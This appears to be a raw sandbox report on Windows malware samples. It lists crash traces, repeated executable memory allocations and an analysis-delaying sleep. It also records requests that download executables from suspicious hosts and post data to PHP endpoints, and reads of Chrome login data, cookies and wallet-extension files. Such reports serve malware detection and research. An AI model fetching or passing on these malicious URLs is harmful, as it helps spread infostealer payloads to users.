registers.esp: 12045684
registers.edi: 0
registers.eax: 0
registers.ebp: 12045724
registers.edx: 32
registers.ebx: 12046028
registers.esi: 0
registers.ecx: 3273616
1 0 0

__exception__

 stacktrace: 
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb1290
0x3bb15cd
0x3bc8929
0x3bedd51
0x3bf7154
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12041364
registers.edi: 0
registers.eax: 0
registers.ebp: 12041404
registers.edx: 32
registers.ebx: 12041708
registers.esi: 0
registers.ecx: 64162720
1 0 0

__exception__

 stacktrace: 
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb129e
0x3bb15cd
0x3bc8929
0x3bedd51
0x3bf7154
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12041364
registers.edi: 0
registers.eax: 0
registers.ebp: 12041404
registers.edx: 32
registers.ebx: 12041708
registers.esi: 0
registers.ecx: 64162720
1 0 0

__exception__

 stacktrace: 
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 59 79 3b
exception.symbol: csotxvbhujdrvtrgizng8f7v+0x1016
exception.instruction: mov dword ptr [eax], ecx
exception.module: CsOtXVBhUjDrvtRgizng8F7v.exe
exception.exception_code: 0xc0000005
exception.offset: 4118
exception.address: 0x101016
registers.esp: 9173700
registers.edi: 0
registers.eax: 0
registers.ebp: 9173716
registers.edx: 1052672
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x544d18
0x4b2e0a
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: 18 4d 54 00 00 00 00 00 18 4d 54 00 00 00 00 00
exception.instruction: sbb byte ptr [rbp + 0x54], cl
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x544d18
registers.r14: 183561024
registers.r15: 183561464
registers.rcx: 1432
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 76853824
registers.rsp: 183560200
registers.r11: 183564720
registers.r8: 1999536524
registers.r9: 0
registers.rdx: 1476
registers.r12: 34322784
registers.rbp: 183560336
registers.rdi: 34059328
registers.rax: 4926976
registers.r13: 183560896
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://45.133.1.182/proxies.txt
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://37.0.8.119/service/communication.php
suspicious_features Connection to IP address suspicious_request GET http://37.0.8.119/base/api/statistics.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://37.0.8.119/base/api/getData.php
suspicious_features Connection to IP address suspicious_request HEAD http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features Connection to IP address suspicious_request GET http://45.133.1.107/download/NiceProcessX64.bmp
suspicious_features Connection to IP address suspicious_request HEAD http://194.145.227.159/pub.php?pub=two
suspicious_features Connection to IP address suspicious_request GET http://194.145.227.159/pub.php?pub=two
suspicious_features Connection to IP address suspicious_request GET http://186.2.171.3/seemorebty/il.php?e=CsOtXVBhUjDrvtRgizng8F7v
suspicious_features POST method with no referer header suspicious_request POST http://www.cjnovone.top/Home/Index/lkdinl
suspicious_features GET method with no useragent header suspicious_request GET http://safialinks.com/Widgets/FolderShare.exe
suspicious_features GET method with no useragent header suspicious_request GET http://safialinks.com/xJRtjaHLw25uhP75sj4j5SDQa3dAyG/BestCPM/Soft_Manager_Cpm.exe
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST https://connectini.net/Series/SuperNitou.php
request GET http://45.133.1.182/proxies.txt
request POST http://37.0.8.119/service/communication.php
request GET http://37.0.8.119/base/api/statistics.php
request POST http://37.0.8.119/base/api/getData.php
request HEAD http://45.133.1.107/download/NiceProcessX64.bmp
request GET http://45.133.1.107/download/NiceProcessX64.bmp
request HEAD http://194.145.227.159/pub.php?pub=two
request HEAD http://threesmallhills.com/pub3.exe
request HEAD http://www.nqhobby.com/askhelp58/askinstall58.exe
request HEAD http://ukcom.pw/adsli/md7_7dfj.exe
request HEAD http://install-cb.ru/CalcCryptoInstalww.exe
request GET http://threesmallhills.com/pub3.exe
request GET http://ukcom.pw/adsli/md7_7dfj.exe
request GET http://194.145.227.159/pub.php?pub=two
request HEAD http://www.nqhobby.com/askinstall58.exe
request GET http://install-cb.ru/CalcCryptoInstalww.exe
request GET http://www.nqhobby.com/askhelp58/askinstall58.exe
request GET http://www.nqhobby.com/askinstall58.exe
request GET http://186.2.171.3/seemorebty/il.php?e=CsOtXVBhUjDrvtRgizng8F7v
request GET http://www.iyiqian.com/
request POST http://www.cjnovone.top/Home/Index/lkdinl
request HEAD http://safialinks.com/Installer_Provider/ShareFolder.exe
request GET http://safialinks.com/Installer_Provider/ShareFolder.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://safialinks.com/Widgets/FolderShare.exe
request GET http://safialinks.com/xJRtjaHLw25uhP75sj4j5SDQa3dAyG/BestCPM/Soft_Manager_Cpm.exe
request GET https://yandex.ru/
request GET https://ipinfo.io/widget
request GET https://cdn.discordapp.com/attachments/882087629896691744/894083102190764052/Cube_WW14.bmp
request GET https://cdn.discordapp.com/attachments/891021838312931420/895238855698051082/PL_Client.bmp
request GET https://cdn.discordapp.com/attachments/882087629896691744/890166075864543242/installer_2021-09-21_16-31.bmp
request GET https://cdn.discordapp.com/attachments/882087629896691744/890166081547825162/LivelyScreenRecLy2109.bmp
request GET https://dc-repository.com/sfx_123_207.exe
request GET https://www.listincode.com/
request GET https://iplogger.org/14Jup7
request GET https://publishersharef.s3.eu-north-1.amazonaws.com/Sharefolder.exe
request POST https://connectini.net/Series/SuperNitou.php
request POST http://37.0.8.119/service/communication.php
request POST http://37.0.8.119/base/api/getData.php
request POST http://www.cjnovone.top/Home/Index/lkdinl
request POST https://connectini.net/Series/SuperNitou.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1892
region_size: 1323008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03ba0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 2359296
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000008e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1321000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef19bb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002160000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002250000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1322000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1324000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b6a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b7c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c46000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b6b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b7a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91ce0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91bbd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91ce1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91b7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cf0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cf1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cf2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91c92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe91cf3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description u7bmZ_Jch5QWYEh3mRgkn8v4.exe tried to sleep 225 seconds, actually delayed analysis time by 225 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 8456473196824849641
root_path: C:\Program Files (x86)\My manager4youdrivers\
total_number_of_bytes: 4294967295
0 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 13694136320
root_path: C:\Program Files (x86)\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 13521285120
free_bytes_available: 13521285120
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
Application Crash Process chrome.exe with pid 3104 crashed
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0x544d18
0x4b2e0a
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30
0x30

exception.instruction_r: 18 4d 54 00 00 00 00 00 18 4d 54 00 00 00 00 00
exception.instruction: sbb byte ptr [rbp + 0x54], cl
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x544d18
registers.r14: 183561024
registers.r15: 183561464
registers.rcx: 1432
registers.rsi: 17302540
registers.r10: 0
registers.rbx: 76853824
registers.rsp: 183560200
registers.r11: 183564720
registers.r8: 1999536524
registers.r9: 0
registers.rdx: 1476
registers.r12: 34322784
registers.rbp: 183560336
registers.rdi: 34059328
registers.rax: 4926976
registers.r13: 183560896
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\icon.png
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\3104-1633592404530000.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-615EB71C-C20.pma
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\4532e9ed-376c-41b6-8ead-bdd325a6cfae.dmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\background.html
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F2CDF32-998.pma
